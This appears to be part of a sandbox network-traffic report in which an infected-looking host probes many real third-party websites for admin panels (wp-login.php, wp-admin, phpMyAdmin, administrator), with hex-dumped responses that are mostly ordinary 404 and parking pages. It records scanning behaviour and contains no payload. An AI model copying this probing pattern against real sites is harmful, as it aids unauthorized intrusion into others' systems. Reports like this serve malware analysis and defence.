2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 76 61 6c 69 64 61 74 Data Ascii: ('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), validat
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 69 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 64 6f 63 6c 69 6e 6b 73 Data Ascii: in.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.js', 1) .add('doclinks

Session ID	Source IP	Source Port	Destination IP	Destination Port
164	192.168.2.6	62725	217.26.61.200	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	268	OUT	GET /administrator/ HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=i3lvqgq0ufurmkbj7l8g7oodcfvqs85s User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://eskimo.ch/administrator/
2024-02-20 23:26:14 UTC	394	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Link: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:14 UTC	7798	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 20 3e 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4b 35 32 4d 59 4b 4c 43 48 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 Data Ascii: 2000<!DOCTYPE html><html dir="ltr" lang="de-CH" prefix="og: https://ogp.me/ns#"><head >... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=G-K52MYKLCHE"></script><script> window.dataLay
2024-02-20 23:26:14 UTC	400	IN	Data Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e Data Ascii: ;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.
2024-02-20 23:26:14 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:14 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 74 65 72 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 65 6d 20 Data Ascii: 2000ter{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em
2024-02-20 23:26:14 UTC	6	IN	Data Raw: 3b 7d 2e 68 61 73 Data Ascii: ;}.has
2024-02-20 23:26:14 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:14 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d Data Ascii: 2000-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--
2024-02-20 23:26:14 UTC	6	IN	Data Raw: 64 2d 63 6f 6c 6f Data Ascii: d-colo
2024-02-20 23:26:14 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:14 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 61 63 63 65 6e 74 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 7b 2d 2d 64 69 76 69 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 5f 5f 74 65 78 74 7b 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 73 65 63 6f 6e 64 61 72 Data Ascii: 2000r:var( --e-global-color-accent );}.elementor-widget-divider{--divider-color:var( --e-global-color-secondary );}.elementor-widget-divider .elementor-divider__text{color:var( --e-global-color-secondary );font-family:var( --e-global-typography-secondar

Session ID	Source IP	Source Port	Destination IP	Destination Port
165	192.168.2.6	62467	144.91.85.110	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	172	OUT	GET /wp-login.php HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2024-02-20 23:26:13 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
166	192.168.2.6	62939	85.214.145.11	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	173	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: braekling.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:14 UTC	448	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:26:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://braekling.de/wp-json/>; rel="https://api.w.org/" Server-Timing: wp-before-template;dur=282.06, wp-before-template-db-queries;dur=8.77
2024-02-20 23:26:14 UTC	15936	IN	Data Raw: 31 64 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 Data Ascii: 1dc8<!DOCTYPE html><html lang="de-DE" class="no-js"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This
2024-02-20 23:26:14 UTC	16384	IN	Data Raw: 4b 5a 22 3a 22 4b 61 73 61 63 68 73 74 61 6e 22 2c 22 51 41 22 3a 22 4b 61 74 61 72 22 2c 22 4b 45 22 3a 22 4b 65 6e 69 61 22 2c 22 4b 47 22 3a 22 4b 69 72 67 69 73 69 73 74 61 6e 22 2c 22 4b 49 22 3a 22 4b 69 72 69 62 61 74 69 22 2c 22 55 4d 22 3a 22 4b 6c 65 69 6e 65 72 65 20 49 6e 73 65 6c 62 65 73 69 74 7a 75 6e 67 65 6e 20 64 65 72 20 56 65 72 65 69 6e 69 67 74 65 6e 20 53 74 61 61 74 65 6e 22 2c 22 43 43 22 3a 22 4b 6f 6b 6f 73 69 6e 73 65 6c 6e 22 2c 22 43 4f 22 3a 22 4b 6f 6c 75 6d 62 69 65 6e 22 2c 22 4b 4d 22 3a 22 4b 6f 6d 6f 72 65 6e 22 2c 22 43 47 22 3a 22 4b 6f 6e 67 6f 22 2c 22 43 44 22 3a 22 4b 6f 6e 67 6f 2c 20 44 65 6d 6f 6b 72 61 74 69 73 63 68 65 20 52 65 70 75 62 6c 69 6b 22 2c 22 4b 52 22 3a 22 4b 6f 72 65 61 22 2c 22 48 52 22 3a 22 Data Ascii: KZ":"Kasachstan","QA":"Katar","KE":"Kenia","KG":"Kirgisistan","KI":"Kiribati","UM":"Kleinere Inselbesitzungen der Vereinigten Staaten","CC":"Kokosinseln","CO":"Kolumbien","KM":"Komoren","CG":"Kongo","CD":"Kongo, Demokratische Republik","KR":"Korea","HR":"
2024-02-20 23:26:14 UTC	15044	IN	Data Raw: 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 62 6f 72 64 65 72 2d Data Ascii: ransform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-

Session ID	Source IP	Source Port	Destination IP	Destination Port
167	192.168.2.6	63336	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	378	OUT	GET /wp-admin/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://cfgteam.com/wp-login.php
2024-02-20 23:26:13 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_bZ/V6hnyB2AOtBuL0mQSvejPeJHCF153Yzr5RegSxlx/Fq4yA4qr1uIHOthwxTj9519P/Bv7JIoKV6ociq9OEw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:13 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
168	192.168.2.6	63341	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	174	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Nbft0tbbO+9Ys0BQtn42raMz+Hxflgf2lRu8LMqXl5BaSQTVflgfkZzjGh8Ay+5Q7/Rr+PJtwYgk19OCS6yu9A Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:13 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
169	192.168.2.6	63111	13.248.243.5	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	214	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: dps_site_id=us-east-1 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	288	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Server: DPS/2.0.0+sha-c81b86d X-Version: c81b86d X-SiteId: us-east-1 Set-Cookie: dps_site_id=us-east-1; path=/; secure Date: Tue, 20 Feb 2024 23:26:13 GMT Connection: close
2024-02-20 23:26:13 UTC	964	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco

Session ID	Source IP	Source Port	Destination IP	Destination Port
170	192.168.2.6	63187	81.169.145.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:14 UTC	190	OUT	GET /phpmyadmin/ HTTP/1.1 Host: creativ-moebelwerkstaetten.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	395	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:14 GMT Server: Apache/2.4.58 (Unix) X-Powered-By: PHP/8.2.15 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: private, must-revalidate X-Redirect-By: WordPress Vary: User-Agent Location: https://www.creativ-moebelwerkstaetten.de/phpmyadmin/ Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
171	192.168.2.6	63194	217.26.61.200	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:14 UTC	170	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:15 UTC	458	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:14 GMT Server: Apache Set-Cookie: PHPSESSID=sfq50kb1qfvnss6o2cj86hptn5kgkaui; path=/ Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Link: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
